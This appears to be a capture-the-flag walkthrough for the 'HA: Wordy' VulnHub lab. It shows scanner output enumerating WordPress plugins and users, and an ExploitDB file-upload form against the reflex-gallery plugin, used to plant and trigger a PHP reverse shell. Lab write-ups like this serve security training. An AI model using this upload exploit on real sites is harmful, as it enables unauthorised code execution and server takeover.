https://www.hackingarticles.in/ha-wordy-vulnhub-walkthrough/
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: Host: 127.0.1.1
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.81.23 -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 13]
/javascript (Status: 301) [Size: 319] [--> <http://192.168.81.23/javascript/>]
/server-status (Status: 403) [Size: 278]
/wordpress (Status: 301) [Size: 318] [--> <http://192.168.81.23/wordpress/>]
┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://192.168.190.23/wordpress/>
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://192.168.190.23/wordpress/> [192.168.190.23]
[+] Started: Thu Jul 28 11:13:57 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://192.168.190.23/wordpress/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://192.168.190.23/wordpress/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://192.168.190.23/wordpress/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://192.168.190.23/wordpress/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Found By: Rss Generator (Passive Detection)
| - <http://192.168.190.23/wordpress/index.php/feed/>, <generator><https://wordpress.org/?v=5.2.3></generator>
| - <http://192.168.190.23/wordpress/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.2.3></generator>
[+] WordPress theme in use: twentysixteen
| Location: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/>
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/readme.txt>
| [!] The version is out of date, the latest version is 2.7
| Style URL: <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3>
| Style Name: Twenty Sixteen
| Style URI: <https://wordpress.org/themes/twentysixteen/>
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: <https://wordpress.org/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://192.168.190.23/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3>, Match: 'Version: 2.0'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] mail-masta
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/mail-masta/>
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/mail-masta/readme.txt>
[+] reflex-gallery
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/>
| Last Updated: 2021-03-10T02:38:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/readme.txt>
[+] site-editor
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/site-editor/>
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/site-editor/readme.txt>
[+] slideshow-gallery
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/slideshow-gallery/>
| Last Updated: 2021-12-21T06:31:00.000Z
| [!] The version is out of date, the latest version is 1.7.4.4
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.4.6 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/slideshow-gallery/readme.txt>
[+] wp-easycart-data
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-easycart-data/>
|
| Found By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.
[+] wp-support-plus-responsive-ticket-system
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/>
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt>
[+] wp-symposium
| Location: <http://192.168.190.23/wordpress/wp-content/plugins/wp-symposium/>
| Last Updated: 2015-08-21T12:36:00.000Z
| [!] The version is out of date, the latest version is 15.8.1
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 15.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <http://192.168.190.23/wordpress/wp-content/plugins/wp-symposium/readme.txt>
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - <http://192.168.81.23/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] aarti
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
As we can see there is many plugins, here I will list out one by one
mail-masta 1.0
reflex-gallery 3.1.3
site-editor 1.1.1
slideshow-gallery 1.4.6
wp-easycart-data
wp-support-plus-responsive-ticket-system 7.1.3
wp-symposium 15.1
This will be targeting reflex-gallery 3.1.3
Offensive Security's Exploit Database Archive
From the ExploitDB, we extract our own payload:
┌──(kali㉿kali)-[~]
└─$ cat fileupload.html
<form method="POST" action="<http://192.168.190.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=07>" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
Simply choose our php reverse shell
Then we upload successful
To trigger the reverse shell we then visiting
<http://192.168.190.23/wordpress/wp-content/uploads/2022/07/php-reverse-shell.php>